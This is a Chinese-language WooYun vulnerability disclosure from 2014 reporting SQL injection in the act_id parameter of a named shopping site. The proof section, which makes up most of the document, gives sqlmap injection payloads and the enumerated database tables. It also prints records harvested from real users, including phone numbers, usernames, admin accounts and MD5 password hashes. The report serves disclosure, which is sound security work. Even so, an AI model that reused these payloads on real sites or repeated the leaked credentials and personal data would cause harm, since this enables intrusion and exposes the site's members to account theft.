当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-084637

漏洞标题:某购物平台SQL注入泄漏敏感信息

相关厂商:经典购

漏洞作者: an0nym0u5

提交时间:2014-11-25 17:24

修复时间:2015-01-09 17:26

公开时间:2015-01-09 17:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:13

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-11-25: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-01-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

SQL注入

详细说明:

网站地址:http://www.whjdsc.com/

jd1.jpg


注入点:http://www.whjdsc.com/goods_sales.php?act_id=4
注入参数:act_id
可直接拖库,泄漏管理员以及会员敏感信息。

漏洞证明:

GET parameter 'act_id' is vulnerable. Do you want to keep testing the others? [y
/N] y
sqlmap identified the following injection points with a total of 28 HTTP(s) requ
ests:
---
Place: GET
Parameter: act_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: act_id=4 AND 2021=2021
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: act_id=4 AND (SELECT 8873 FROM(SELECT COUNT(*),CONCAT(CHAR(58,122,1
15,107,58),(SELECT (CASE WHEN (8873=8873) THEN 1 ELSE 0 END)),CHAR(58,102,112,12
1,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
---
[12:14:01] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: PHP 5.2.6, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[12:14:01] [INFO] fetching database names
[12:14:01] [INFO] the SQL query used returns 2 entries
[12:14:01] [INFO] retrieved: information_schema
[12:14:01] [INFO] retrieved: whjdsc
available databases [2]:
[*] information_schema
[*] whjdsc


很明显,whjdsc是我们关注的数据库:

Database: whjdsc
[91 tables]
+-------------------------+
| ecs_account_log         |
| ecs_ad                  |
| ecs_ad_custom           |
| ecs_ad_position         |
| ecs_admin_action        |
| ecs_admin_log           |
| ecs_admin_message       |
| ecs_admin_user          |
| ecs_adsense             |
| ecs_affiliate_log       |
| ecs_agency              |
| ecs_area_region         |
| ecs_article             |
| ecs_article_cat         |
| ecs_attribute           |
| ecs_auction_log         |
| ecs_auto_manage         |
| ecs_back_goods          |
| ecs_back_order          |
| ecs_bonus_type          |
| ecs_booking_goods       |
| ecs_brand               |
| ecs_card                |
| ecs_cart                |
| ecs_cat_recommend       |
| ecs_category            |
| ecs_collect_goods       |
| ecs_comment             |
| ecs_crons               |
| ecs_delivery_goods      |
| ecs_delivery_order      |
| ecs_email_list          |
| ecs_email_sendlist      |
| ecs_error_log           |
| ecs_exchange_goods      |
| ecs_favourable_activity |
| ecs_feedback            |
| ecs_friend_link         |
| ecs_goods               |
| ecs_goods_activity      |
| ecs_goods_article       |
| ecs_goods_attr          |
| ecs_goods_cat           |
| ecs_goods_gallery       |
| ecs_goods_type          |
| ecs_goods_visiter       |
| ecs_group_goods         |
| ecs_keywords            |
| ecs_link_goods          |
| ecs_mail_templates      |
| ecs_member_price        |
| ecs_nav                 |
| ecs_order_action        |
| ecs_order_goods         |
| ecs_order_info          |
| ecs_pack                |
| ecs_package_goods       |
| ecs_pay_log             |
| ecs_payment             |
| ecs_plugins             |
| ecs_products            |
| ecs_reg_extend_info     |
| ecs_reg_fields          |
| ecs_region              |
| ecs_role                |
| ecs_searchengine        |
| ecs_sessions            |
| ecs_sessions_data       |
| ecs_shipping            |
| ecs_shipping_area       |
| ecs_shop_config         |
| ecs_snatch_log          |
| ecs_stats               |
| ecs_suppliers           |
| ecs_tag                 |
| ecs_template            |
| ecs_topic               |
| ecs_user_account        |
| ecs_user_address        |
| ecs_user_bonus          |
| ecs_user_feed           |
| ecs_user_rank           |
| ecs_users               |
| ecs_virtual_card        |
| ecs_volume_price        |
| ecs_vote                |
| ecs_vote_log            |
| ecs_vote_option         |
| ecs_wholesale           |
| ecs_zxcomment           |
| neworder                |
+-------------------------+


这里边有很多表,重点是ecs_admin_user和ecs_users:

jd2.jpg


管理员帐号密码已经出来。继续看ecs_users表:

Database: whjdsc
Table: ecs_users
[35 columns]
+-----------------+------------------------+
| Column          | Type                   |
+-----------------+------------------------+
| address_id      | mediumint(8) unsigned  |
| aite_id         | text                   |
| alias           | varchar(60)            |
| answer          | varchar(255)           |
| birthday        | date                   |
| credit_line     | decimal(10,2) unsigned |
| ec_salt         | varchar(10)            |
| email           | varchar(60)            |
| flag            | tinyint(3) unsigned    |
| frozen_money    | decimal(10,2)          |
| home_phone      | varchar(20)            |
| is_special      | tinyint(3) unsigned    |
| is_validated    | tinyint(3) unsigned    |
| last_ip         | varchar(15)            |
| last_login      | int(11) unsigned       |
| last_time       | datetime               |
| mobile_phone    | varchar(20)            |
| msn             | varchar(60)            |
| office_phone    | varchar(20)            |
| parent_id       | mediumint(9)           |
| passwd_answer   | varchar(255)           |
| passwd_question | varchar(50)            |
| password        | varchar(32)            |
| pay_points      | int(10) unsigned       |
| qq              | varchar(20)            |
| question        | varchar(255)           |
| rank_points     | int(10) unsigned       |
| reg_time        | int(10) unsigned       |
| salt            | varchar(10)            |
| sex             | tinyint(1) unsigned    |
| user_id         | mediumint(8) unsigned  |
| user_money      | decimal(10,2)          |
| user_name       | varchar(60)            |
| user_rank       | tinyint(3) unsigned    |
| visit_count     | smallint(5) unsigned   |
+-----------------+------------------------+


用户详细都在这里。列一部分:

[12:52:18] [INFO] fetching columns 'user_name, password, user_id, mobile_phone
entries for table 'ecs_users' on database 'whjdsc'
[12:52:18] [INFO] the SQL query used returns 145 entries
[12:52:18] [INFO] retrieved: 12345678912
[12:52:19] [INFO] retrieved: 554fcae493e564ee0dc75bdf2ebf94ca
[12:52:19] [INFO] retrieved: 1
[12:52:19] [INFO] retrieved: 125882949
[12:52:19] [INFO] retrieved: 232059cb5361a9336ccf1b8c2ba7657a
[12:52:19] [INFO] retrieved: 2
[12:52:19] [INFO] retrieved: 13329749788
[12:52:20] [INFO] retrieved: 1cb251ec0d568de6a929b520c4aed8d1
[12:52:20] [INFO] retrieved: 3
[12:52:20] [INFO] retrieved: 13554090008
[12:52:20] [INFO] retrieved: 815a71fb334412e7ba4595741c5a111d
[12:52:20] [INFO] retrieved: 5
[12:52:28] [INFO] retrieved: 13971362808
[12:52:28] [INFO] retrieved: eac4108912af90ae96e858190f4d8af7
[12:52:29] [INFO] retrieved: 6
[12:52:29] [INFO] retrieved: 750155706
[12:52:29] [INFO] retrieved: 13995669913
[12:52:29] [INFO] retrieved: 6e3c4c536c79a52bfcdd9328048ca75e
[12:52:29] [INFO] retrieved: 7
[12:52:29] [INFO] retrieved: 18672192586
[12:52:29] [INFO] retrieved: 96e79218965eb72c92a549dd5a330112
[12:52:30] [INFO] retrieved: 8
[12:52:30] [INFO] retrieved: 18955163067
[12:52:30] [INFO] retrieved: a684224d67907e32a7ba70ebfa67efce
[12:52:30] [INFO] retrieved: 9
[12:52:30] [INFO] retrieved: 18998752158
[12:52:31] [INFO] retrieved: 5eee5eead6fd883106ffd6e9d1f0f65a
[12:52:31] [INFO] retrieved: 10
[12:52:31] [INFO] retrieved: 56658585
[12:52:31] [INFO] retrieved: e10adc3949ba59abbe56e057f20f883e
[12:52:31] [INFO] retrieved: 11
[12:52:32] [INFO] retrieved: 5800
[12:52:32] [INFO] retrieved: 305a02ad3d398666e32ca6d194b1370a
[12:52:32] [INFO] retrieved: 12
[12:52:32] [INFO] retrieved: admin1
[12:52:32] [INFO] retrieved: 62bb11f0245ecb7ae19e0fe1f3cbf4bc
[12:52:32] [INFO] retrieved: 13
[12:52:33] [INFO] retrieved: admin2
[12:52:33] [INFO] retrieved: 3e7276336d9f5ac19eb71d125048e3d4
[12:52:33] [INFO] retrieved: 14
[12:52:33] [INFO] retrieved: AdomaGaffef
[12:52:33] [INFO] retrieved: d1c92a24639ae1d523cfa62e71c6dd2e
[12:52:33] [INFO] retrieved: 15
[12:52:34] [INFO] retrieved: ageless
[12:52:34] [INFO] retrieved: 2b9358635e18f1f66b222111ee1240d1


只证明危害,就到这里不继续测试。

修复方案:

act_id参数严格过滤。。

版权声明:转载请注明来源 an0nym0u5@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝